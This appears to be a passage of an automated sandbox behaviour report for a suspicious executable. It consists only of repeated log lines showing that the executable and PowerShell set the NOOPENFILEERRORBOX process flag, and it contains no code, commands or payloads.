                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
